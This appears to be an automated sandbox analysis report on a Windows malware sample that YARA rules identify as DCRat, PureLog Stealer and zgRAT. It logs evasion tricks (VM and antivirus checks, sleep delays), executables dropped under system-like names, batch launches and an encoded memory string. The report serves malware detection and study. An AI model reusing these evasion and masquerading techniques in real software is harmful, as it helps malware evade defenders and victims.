                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                              Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Uses ping.exe to sleep
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeMemory allocated: 840000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeMemory allocated: 1A4D0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeMemory allocated: D40000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeMemory allocated: 1A7E0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeMemory allocated: 1540000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeMemory allocated: 1B350000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeMemory allocated: 2240000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeMemory allocated: 1A450000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeMemory allocated: 1270000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeMemory allocated: 1AFD0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeMemory allocated: 30C0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeMemory allocated: 1B0C0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeMemory allocated: B90000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeMemory allocated: 1A6A0000 memory reserve | memory write watch
                              Source: C:\Users\user\RuntimeBroker.exeMemory allocated: 25A0000 memory reserve | memory write watch
                              Source: C:\Users\user\RuntimeBroker.exeMemory allocated: 1A5A0000 memory reserve | memory write watch
                              Source: C:\Users\user\RuntimeBroker.exeMemory allocated: 34E0000 memory reserve | memory write watch
                              Source: C:\Users\user\RuntimeBroker.exeMemory allocated: 1B4E0000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeMemory allocated: 1250000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeMemory allocated: 1B040000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeMemory allocated: DF0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeMemory allocated: 1A8A0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeMemory allocated: DF0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeMemory allocated: 1ADA0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeDropped PE file which has not been started: C:\Users\user\Desktop\xxMkqOtN.logJump to dropped file
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeDropped PE file which has not been started: C:\Users\user\Desktop\sTRlxExW.logJump to dropped file
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeDropped PE file which has not been started: C:\Users\user\Desktop\CAgBdTQY.logJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeDropped PE file which has not been started: C:\Users\user\Desktop\myawJPbK.logJump to dropped file
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeDropped PE file which has not been started: C:\Users\user\Desktop\fuHfGerv.logJump to dropped file
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeDropped PE file which has not been started: C:\Users\user\Desktop\gwaXxxDZ.logJump to dropped file
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeDropped PE file which has not been started: C:\Users\user\Desktop\MjzRNvWG.logJump to dropped file
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeDropped PE file which has not been started: C:\Users\user\Desktop\cPGganVc.logJump to dropped file
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeDropped PE file which has not been started: C:\Users\user\Desktop\VTXhBlNT.logJump to dropped file
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeDropped PE file which has not been started: C:\Users\user\Desktop\VLoPWCmN.logJump to dropped file
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe TID: 5348Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe TID: 7788Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe TID: 1864Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe TID: 7080Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe TID: 7580Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe TID: 7592Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe TID: 7568Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe TID: 7608Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\RuntimeBroker.exe TID: 7604Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\RuntimeBroker.exe TID: 7616Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe TID: 7744Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe TID: 7768Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe TID: 8124Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: 4ra1Fo2Zql.exe, 00000000.00000002.2076580924.000000001B759000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                              Source: 4ra1Fo2Zql.exe, 00000000.00000002.2079535829.000000001B7A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `1|pDn-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: GrVEPTmsoNTbY.exe, 0000000A.00000002.2197171062.000000001B0B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
                              Source: GrVEPTmsoNTbY.exe, 0000000A.00000002.2192322493.000000001283D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Mxc5RNhbsiyZCTX2NviatuckXivc2+cKhxl4fhEDNzeFYMKE1NI+zseZotDnWEOz1JeJ9MV+osTHoC/f1Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                              Source: w32tm.exe, 0000002C.00000002.2237357810.00000175DBE59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess token adjusted: Debug
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess token adjusted: Debug
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess token adjusted: Debug
                              Source: C:\Users\user\RuntimeBroker.exeProcess token adjusted: Debug
                              Source: C:\Users\user\RuntimeBroker.exeProcess token adjusted: Debug
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeMemory allocated: page read and write | page guardJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00tp5zly\00tp5zly.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\IZdub348jc.bat" Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2144.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCFABAA3A3EFF44E7388BEDB3353C25726.TMP"Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES22AB.tmp" "c:\Windows\System32\CSC1FF918B0E6FF4E65A25AACD427A2AFF8.TMP"Jump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat" Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeQueries volume information: C:\Users\user\Desktop\4ra1Fo2Zql.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeQueries volume information: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeQueries volume information: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeQueries volume information: C:\Users\user\Desktop\4ra1Fo2Zql.exe VolumeInformation
                              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeQueries volume information: C:\Users\user\Desktop\4ra1Fo2Zql.exe VolumeInformation
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeQueries volume information: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe VolumeInformation
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeQueries volume information: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe VolumeInformation
                              Source: C:\Users\user\RuntimeBroker.exeQueries volume information: C:\Users\user\RuntimeBroker.exe VolumeInformation
                              Source: C:\Users\user\RuntimeBroker.exeQueries volume information: C:\Users\user\RuntimeBroker.exe VolumeInformation
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeQueries volume information: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe VolumeInformation
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeQueries volume information: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe VolumeInformation
                              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeQueries volume information: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe VolumeInformation
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: GrVEPTmsoNTbY.exe, 0000000A.00000002.2197171062.000000001B0B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                              Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000000.00000002.2064515197.00000000126E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 4ra1Fo2Zql.exe PID: 5688, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: GrVEPTmsoNTbY.exe PID: 7096, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: GrVEPTmsoNTbY.exe PID: 7716, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: 4ra1Fo2Zql.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.4ra1Fo2Zql.exe.30000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1995307367.0000000000032000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\RuntimeBroker.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: 4ra1Fo2Zql.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.4ra1Fo2Zql.exe.30000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\RuntimeBroker.exe, type: DROPPED

                              Remote Access Functionality

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000000.00000002.2064515197.00000000126E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 4ra1Fo2Zql.exe PID: 5688, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: GrVEPTmsoNTbY.exe PID: 7096, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: GrVEPTmsoNTbY.exe PID: 7716, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: 4ra1Fo2Zql.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.4ra1Fo2Zql.exe.30000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1995307367.0000000000032000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\RuntimeBroker.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: 4ra1Fo2Zql.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.4ra1Fo2Zql.exe.30000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\RuntimeBroker.exe, type: DROPPED

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
